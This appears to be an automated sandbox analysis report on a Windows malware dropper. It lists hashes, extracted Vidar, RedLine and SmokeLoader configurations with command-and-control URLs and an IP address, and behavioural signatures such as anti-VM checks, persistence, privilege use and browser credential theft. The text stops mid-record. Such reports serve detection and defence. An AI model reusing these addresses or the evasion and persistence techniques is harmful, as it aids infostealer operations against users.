Overview
overview
10Static
static
071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows7_x64
10071F6BD61A...51.exe
windows11_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10071F6BD61A...51.exe
windows10_x64
10Analysis
-
max time kernel
430s -
max time network
435s -
platform
windows10_x64 -
resource
win10-en-20210920 -
submitted
28-09-2021 20:51
Static task
static1
Behavioral task
behavioral1
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7-ja-20210920
Behavioral task
behavioral2
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7v20210408
Behavioral task
behavioral3
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win7-de-20210920
Behavioral task
behavioral4
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win11
Behavioral task
behavioral5
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10v20210408
Behavioral task
behavioral6
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-ja-20210920
Behavioral task
behavioral7
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-en-20210920
Behavioral task
behavioral8
Sample
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
Resource
win10-de-20210920
General
-
Target
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe
-
Size
3.9MB
-
MD5
1be0d2741eaac6804e24a7586b1086b0
-
SHA1
cdb330156b2063c6f259cb10a787463756798f7a
-
SHA256
071f6bd61aef9f209be1bfb16ef1fb14bd44804fcab511b129deeb7822948ef9
-
SHA512
cc9352b0ace0a51cac07069adf33d98e548e6726e71bf4582dcb15c3d7b0a7806765ffc57f95511f1aeca798d7fbf44c08bc5ebe7bc13626b8b7bcd0df872f85
Malware Config
Extracted
vidar
40.1
706
https://eduarroma.tumblr.com/
-
profile_id
706
Extracted
redline
pab4
185.215.113.15:61506
Extracted
smokeloader
2020
http://aucmoney.com/upload/
http://thegymmum.com/upload/
http://atvcampingtrips.com/upload/
http://kuapakualaman.com/upload/
http://renatazarazua.com/upload/
http://nasufmutlu.com/upload/
http://naghenrietti1.top/
http://kimballiett2.top/
http://xadriettany3.top/
http://jebeccallis4.top/
http://nityanneron5.top/
http://umayaniela6.top/
http://lynettaram7.top/
http://sadineyalas8.top/
http://geenaldencia9.top/
http://aradysiusep10.top/
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
rundll32.exerundll32.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4244 3132 rundll32.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7272 3132 rundll32.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 4 IoCs
Processes:
resource yara_rule behavioral7/memory/820-220-0x00000000049D0000-0x00000000049EC000-memory.dmp family_redline behavioral7/memory/820-222-0x0000000004C90000-0x0000000004CAA000-memory.dmp family_redline behavioral7/memory/1832-624-0x000000000041C5D2-mapping.dmp family_redline behavioral7/memory/2880-614-0x000000000041C5DE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\pPrCdc38TjM_66g0Ylwoyi1d.exe family_socelars C:\Users\Admin\Documents\pPrCdc38TjM_66g0Ylwoyi1d.exe family_socelars -
Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
Processes:
WerFault.exedescription pid process target process PID 4292 created 3960 4292 WerFault.exe Thu02966ca5c58f270.exe -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 6 IoCs
Processes:
resource yara_rule behavioral7/memory/3960-200-0x0000000002680000-0x000000000271D000-memory.dmp family_vidar behavioral7/memory/3960-203-0x0000000000400000-0x0000000002403000-memory.dmp family_vidar behavioral7/memory/4236-643-0x0000000003130000-0x0000000003204000-memory.dmp family_vidar behavioral7/memory/2896-647-0x0000000000400000-0x00000000008D6000-memory.dmp family_vidar behavioral7/memory/2896-646-0x0000000000CC0000-0x0000000000D94000-memory.dmp family_vidar behavioral7/memory/4236-664-0x0000000000400000-0x0000000002BFB000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0982C1B2\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0982C1B2\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0982C1B2\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0982C1B2\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0982C1B2\libcurl.dll aspack_v212_v242 -
Creates new service(s) 1 TTPs
-
Downloads MZ/PE file
-
Executes dropped EXE 40 IoCs
Processes:
setup_install.exeThu02588bdad8e7.exeThu02966ca5c58f270.exeThu0247e977c7950492a.exeThu0299d0d70a4d322.exeThu02d385ff55.exeThu02f60acc90a3.exeThu02c015332704.exeThu02483b39590da5492.exeThu02bfe1521bcc038.exeThu0247e977c7950492a.exeRiconobbe.exe.comRiconobbe.exe.comAdb7VpOvSRmGGDjMfj84b8SD.exepPrCdc38TjM_66g0Ylwoyi1d.exexKdIhrs2hpbf0CMryCGMnIAw.exePNEDROaWj9z3C1l4ZYrg2Vk_.exexj96NMMwHZc3VfHCeIW4idK5.exeJGMLQmdZufFmZt_n3dkCIpwM.exeucNTSxJixhBPpqJqlxecqGIk.exeNeek_h8G325oOaR1DwrPrj0I.exeELoSOJbyNqIIENjddsNV_jk8.exebgM6SZzcFD4wqeRjzrwgTPEn.exeHauY9OXiANSqjbeLDAzeneWP.exeYlhK2_p8pF01M_w923OPpswA.exeWGeOvRZMf4C15sagXFJAVwda.exeG3lGZJhyunaBOvMs4LfdAnFA.exee9aGzlA2z816FvSpI98ghOCD.exezwNuxkUY6ZqMnzvQ3Q2AJwBy.exeFO53vX41q8kgjZOQMFvfXiLp.exeD85AFybjUj1qFBqVqSTjR3Xv.exejgzAoeicJ0xruGP9h9cYuvl1.exeG_QdsKdP9K38L5CruVQuqJJm.exeN0T6kUNSszPjslOz7quKpN3n.exe9lii4okD6TF1oWvouLytZbFn.exeConhost.exePaemsLNeJ6RRL5BtdDuvS8A1.exeYzk_o9_tej_A4fp_z5bmvLo4.exeInstall.exe210921.exepid process 2524 setup_install.exe 820 Thu02588bdad8e7.exe 3960 Thu02966ca5c58f270.exe 3940 Thu0247e977c7950492a.exe 3988 Thu0299d0d70a4d322.exe 3788 Thu02d385ff55.exe 2176 Thu02f60acc90a3.exe 1208 Thu02c015332704.exe 2688 Thu02483b39590da5492.exe 1540 Thu02bfe1521bcc038.exe 1192 Thu0247e977c7950492a.exe 4104 Riconobbe.exe.com 4228 Riconobbe.exe.com 4880 Adb7VpOvSRmGGDjMfj84b8SD.exe 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe 4908 xKdIhrs2hpbf0CMryCGMnIAw.exe 4928 PNEDROaWj9z3C1l4ZYrg2Vk_.exe 4936 xj96NMMwHZc3VfHCeIW4idK5.exe 4920 JGMLQmdZufFmZt_n3dkCIpwM.exe 4956 ucNTSxJixhBPpqJqlxecqGIk.exe 4960 Neek_h8G325oOaR1DwrPrj0I.exe 4972 ELoSOJbyNqIIENjddsNV_jk8.exe 4992 bgM6SZzcFD4wqeRjzrwgTPEn.exe 4984 HauY9OXiANSqjbeLDAzeneWP.exe 5064 YlhK2_p8pF01M_w923OPpswA.exe 5056 WGeOvRZMf4C15sagXFJAVwda.exe 5076 G3lGZJhyunaBOvMs4LfdAnFA.exe 5104 e9aGzlA2z816FvSpI98ghOCD.exe 5088 zwNuxkUY6ZqMnzvQ3Q2AJwBy.exe 4112 FO53vX41q8kgjZOQMFvfXiLp.exe 5112 D85AFybjUj1qFBqVqSTjR3Xv.exe 4120 jgzAoeicJ0xruGP9h9cYuvl1.exe 4132 G_QdsKdP9K38L5CruVQuqJJm.exe 4236 N0T6kUNSszPjslOz7quKpN3n.exe 4520 9lii4okD6TF1oWvouLytZbFn.exe 2896 Conhost.exe 436 PaemsLNeJ6RRL5BtdDuvS8A1.exe 1808 Yzk_o9_tej_A4fp_z5bmvLo4.exe 2336 Install.exe 4796 210921.exe -
Modifies Windows Firewall 1 TTPs
-
Checks BIOS information in registry 2 TTPs 12 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
WGeOvRZMf4C15sagXFJAVwda.exeG_QdsKdP9K38L5CruVQuqJJm.exejgzAoeicJ0xruGP9h9cYuvl1.exeD85AFybjUj1qFBqVqSTjR3Xv.exeFO53vX41q8kgjZOQMFvfXiLp.exeucNTSxJixhBPpqJqlxecqGIk.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion WGeOvRZMf4C15sagXFJAVwda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion G_QdsKdP9K38L5CruVQuqJJm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion G_QdsKdP9K38L5CruVQuqJJm.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion jgzAoeicJ0xruGP9h9cYuvl1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion D85AFybjUj1qFBqVqSTjR3Xv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion FO53vX41q8kgjZOQMFvfXiLp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion WGeOvRZMf4C15sagXFJAVwda.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ucNTSxJixhBPpqJqlxecqGIk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion jgzAoeicJ0xruGP9h9cYuvl1.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion D85AFybjUj1qFBqVqSTjR3Xv.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion FO53vX41q8kgjZOQMFvfXiLp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ucNTSxJixhBPpqJqlxecqGIk.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Thu02d385ff55.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Control Panel\International\Geo\Nation Thu02d385ff55.exe -
Loads dropped DLL 8 IoCs
Processes:
setup_install.exexj96NMMwHZc3VfHCeIW4idK5.exepid process 2524 setup_install.exe 2524 setup_install.exe 2524 setup_install.exe 2524 setup_install.exe 2524 setup_install.exe 2524 setup_install.exe 2524 setup_install.exe 4936 xj96NMMwHZc3VfHCeIW4idK5.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Processes:
resource yara_rule C:\Users\Admin\Documents\ucNTSxJixhBPpqJqlxecqGIk.exe themida C:\Users\Admin\Documents\YlhK2_p8pF01M_w923OPpswA.exe themida C:\Users\Admin\Documents\WGeOvRZMf4C15sagXFJAVwda.exe themida behavioral7/memory/4956-556-0x0000000000F60000-0x0000000000F61000-memory.dmp themida behavioral7/memory/5112-564-0x00000000003A0000-0x00000000003A1000-memory.dmp themida behavioral7/memory/5056-563-0x0000000000970000-0x0000000000971000-memory.dmp themida behavioral7/memory/4132-565-0x00000000001F0000-0x00000000001F1000-memory.dmp themida -
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Thu02bfe1521bcc038.exedescription ioc process Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce Thu02bfe1521bcc038.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" Thu02bfe1521bcc038.exe -
Processes:
FO53vX41q8kgjZOQMFvfXiLp.exeWGeOvRZMf4C15sagXFJAVwda.exeucNTSxJixhBPpqJqlxecqGIk.exeD85AFybjUj1qFBqVqSTjR3Xv.exeG_QdsKdP9K38L5CruVQuqJJm.exejgzAoeicJ0xruGP9h9cYuvl1.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA FO53vX41q8kgjZOQMFvfXiLp.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA WGeOvRZMf4C15sagXFJAVwda.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ucNTSxJixhBPpqJqlxecqGIk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA D85AFybjUj1qFBqVqSTjR3Xv.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA G_QdsKdP9K38L5CruVQuqJJm.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA jgzAoeicJ0xruGP9h9cYuvl1.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 7 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 57 ipinfo.io 58 ipinfo.io 161 ipinfo.io 163 ipinfo.io 210 ipinfo.io 443 ip-api.com 23 ip-api.com -
Suspicious use of NtSetInformationThreadHideFromDebugger 7 IoCs
Processes:
ucNTSxJixhBPpqJqlxecqGIk.exeG_QdsKdP9K38L5CruVQuqJJm.exeWGeOvRZMf4C15sagXFJAVwda.exePNEDROaWj9z3C1l4ZYrg2Vk_.exeD85AFybjUj1qFBqVqSTjR3Xv.exejgzAoeicJ0xruGP9h9cYuvl1.exeFO53vX41q8kgjZOQMFvfXiLp.exepid process 4956 ucNTSxJixhBPpqJqlxecqGIk.exe 4132 G_QdsKdP9K38L5CruVQuqJJm.exe 5056 WGeOvRZMf4C15sagXFJAVwda.exe 4928 PNEDROaWj9z3C1l4ZYrg2Vk_.exe 5112 D85AFybjUj1qFBqVqSTjR3Xv.exe 4120 jgzAoeicJ0xruGP9h9cYuvl1.exe 4112 FO53vX41q8kgjZOQMFvfXiLp.exe -
Drops file in Program Files directory 2 IoCs
Processes:
xKdIhrs2hpbf0CMryCGMnIAw.exedescription ioc process File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe xKdIhrs2hpbf0CMryCGMnIAw.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe xKdIhrs2hpbf0CMryCGMnIAw.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 14 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 4292 3960 WerFault.exe Thu02966ca5c58f270.exe 5560 4960 WerFault.exe Neek_h8G325oOaR1DwrPrj0I.exe 4484 4960 WerFault.exe Neek_h8G325oOaR1DwrPrj0I.exe 3148 4960 WerFault.exe Neek_h8G325oOaR1DwrPrj0I.exe 5616 4960 WerFault.exe Neek_h8G325oOaR1DwrPrj0I.exe 2292 4960 WerFault.exe Neek_h8G325oOaR1DwrPrj0I.exe 5800 5088 WerFault.exe zwNuxkUY6ZqMnzvQ3Q2AJwBy.exe 7756 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 7268 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 7844 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 7504 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 7884 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 5508 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe 5504 2600 WerFault.exe y2Y4eOSoaViD5ms7yvalKsJ3.exe -
NSIS installer 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\Documents\xj96NMMwHZc3VfHCeIW4idK5.exe nsis_installer_1 C:\Users\Admin\Documents\xj96NMMwHZc3VfHCeIW4idK5.exe nsis_installer_2 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
Thu0299d0d70a4d322.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Thu0299d0d70a4d322.exe -
Creates scheduled task(s) 1 TTPs 21 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 5864 schtasks.exe 8244 schtasks.exe 11444 schtasks.exe 8060 schtasks.exe 10932 schtasks.exe 7648 schtasks.exe 5856 schtasks.exe 6152 schtasks.exe 6128 schtasks.exe 10592 schtasks.exe 8288 schtasks.exe 8564 schtasks.exe 6048 schtasks.exe 6816 schtasks.exe 4684 schtasks.exe 10332 schtasks.exe 11464 schtasks.exe 9764 schtasks.exe 11700 schtasks.exe 8464 schtasks.exe 6860 schtasks.exe -
Delays execution with timeout.exe 3 IoCs
Processes:
timeout.exetimeout.exetimeout.exepid process 10588 timeout.exe 912 timeout.exe 4748 timeout.exe -
Kills process with taskkill 8 IoCs
Processes:
taskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exetaskkill.exepid process 6684 taskkill.exe 6748 taskkill.exe 7252 taskkill.exe 1908 taskkill.exe 3336 taskkill.exe 10640 taskkill.exe 5996 taskkill.exe 6616 taskkill.exe -
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exeThu0299d0d70a4d322.exeWerFault.exepid process 3568 powershell.exe 3988 Thu0299d0d70a4d322.exe 3988 Thu0299d0d70a4d322.exe 3568 powershell.exe 3568 powershell.exe 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 4292 WerFault.exe 3068 3068 4292 WerFault.exe 4292 WerFault.exe 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 3068 -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
pid process 3068 -
Suspicious behavior: MapViewOfSection 1 IoCs
Processes:
Thu0299d0d70a4d322.exepid process 3988 Thu0299d0d70a4d322.exe -
Suspicious use of AdjustPrivilegeToken 54 IoCs
Processes:
Thu02c015332704.exeThu02f60acc90a3.exepowershell.exeWerFault.exeThu02588bdad8e7.exepPrCdc38TjM_66g0Ylwoyi1d.exeELoSOJbyNqIIENjddsNV_jk8.exedescription pid process Token: SeDebugPrivilege 1208 Thu02c015332704.exe Token: SeDebugPrivilege 2176 Thu02f60acc90a3.exe Token: SeDebugPrivilege 3568 powershell.exe Token: SeRestorePrivilege 4292 WerFault.exe Token: SeBackupPrivilege 4292 WerFault.exe Token: SeDebugPrivilege 4292 WerFault.exe Token: SeDebugPrivilege 820 Thu02588bdad8e7.exe Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeCreateTokenPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeAssignPrimaryTokenPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeLockMemoryPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeIncreaseQuotaPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeShutdownPrivilege 3068 Token: SeCreatePagefilePrivilege 3068 Token: SeMachineAccountPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeTcbPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeSecurityPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeTakeOwnershipPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeLoadDriverPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeSystemProfilePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeSystemtimePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeProfSingleProcessPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeIncBasePriorityPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeCreatePagefilePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeCreatePermanentPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeBackupPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeRestorePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeShutdownPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeDebugPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeAuditPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeSystemEnvironmentPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeChangeNotifyPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeRemoteShutdownPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeUndockPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeSyncAgentPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeEnableDelegationPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeManageVolumePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeImpersonatePrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeCreateGlobalPrivilege 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: 31 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: 32 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: 33 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: 34 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: 35 4896 pPrCdc38TjM_66g0Ylwoyi1d.exe Token: SeDebugPrivilege 4972 ELoSOJbyNqIIENjddsNV_jk8.exe -
Suspicious use of FindShellTrayWindow 6 IoCs
Processes:
Riconobbe.exe.comRiconobbe.exe.compid process 4104 Riconobbe.exe.com 4104 Riconobbe.exe.com 4104 Riconobbe.exe.com 4228 Riconobbe.exe.com 4228 Riconobbe.exe.com 4228 Riconobbe.exe.com -
Suspicious use of SendNotifyMessage 6 IoCs
Processes:
Riconobbe.exe.comRiconobbe.exe.compid process 4104 Riconobbe.exe.com 4104 Riconobbe.exe.com 4104 Riconobbe.exe.com 4228 Riconobbe.exe.com 4228 Riconobbe.exe.com 4228 Riconobbe.exe.com -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
PNEDROaWj9z3C1l4ZYrg2Vk_.exepid process 4928 PNEDROaWj9z3C1l4ZYrg2Vk_.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exeThu0247e977c7950492a.exeThu02bfe1521bcc038.exedescription pid process target process PID 2192 wrote to memory of 2524 2192 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe setup_install.exe PID 2192 wrote to memory of 2524 2192 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe setup_install.exe PID 2192 wrote to memory of 2524 2192 071F6BD61AEF9F209BE1BFB16EF1FB14BD44804FCAB51.exe setup_install.exe PID 2524 wrote to memory of 2636 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2636 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2636 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2248 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2248 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2248 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 3132 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 3132 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 3132 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1344 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1344 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1344 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 868 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 868 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 868 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 916 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 916 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 916 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1172 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1172 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 1172 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2028 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2028 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2028 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2736 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2736 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 2736 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 816 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 816 2524 setup_install.exe cmd.exe PID 2524 wrote to memory of 816 2524 setup_install.exe cmd.exe PID 916 wrote to memory of 820 916 cmd.exe Thu02588bdad8e7.exe PID 916 wrote to memory of 820 916 cmd.exe Thu02588bdad8e7.exe PID 916 wrote to memory of 820 916 cmd.exe Thu02588bdad8e7.exe PID 868 wrote to memory of 3960 868 cmd.exe Thu02966ca5c58f270.exe PID 868 wrote to memory of 3960 868 cmd.exe Thu02966ca5c58f270.exe PID 868 wrote to memory of 3960 868 cmd.exe Thu02966ca5c58f270.exe PID 2248 wrote to memory of 3940 2248 cmd.exe Thu0247e977c7950492a.exe PID 2248 wrote to memory of 3940 2248 cmd.exe Thu0247e977c7950492a.exe PID 2248 wrote to memory of 3940 2248 cmd.exe Thu0247e977c7950492a.exe PID 3132 wrote to memory of 3988 3132 cmd.exe Thu0299d0d70a4d322.exe PID 3132 wrote to memory of 3988 3132 cmd.exe Thu0299d0d70a4d322.exe PID 3132 wrote to memory of 3988 3132 cmd.exe Thu0299d0d70a4d322.exe PID 1172 wrote to memory of 3788 1172 cmd.exe Thu02d385ff55.exe PID 1172 wrote to memory of 3788 1172 cmd.exe Thu02d385ff55.exe PID 1172 wrote to memory of 3788 1172 cmd.exe Thu02d385ff55.exe PID 2636 wrote to memory of 3568 2636 cmd.exe powershell.exe PID 2636 wrote to memory of 3568 2636 cmd.exe powershell.exe PID 2636 wrote to memory of 3568 2636 cmd.exe powershell.exe PID 2028 wrote to memory of 2176 2028 cmd.exe Thu02f60acc90a3.exe PID 2028 wrote to memory of 2176 2028 cmd.exe Thu02f60acc90a3.exe PID 816 wrote to memory of 1208 816 cmd.exe Thu02c015332704.exe PID 816 wrote to memory of 1208 816 cmd.exe Thu02c015332704.exe PID 1344 wrote to memory of 2688 1344 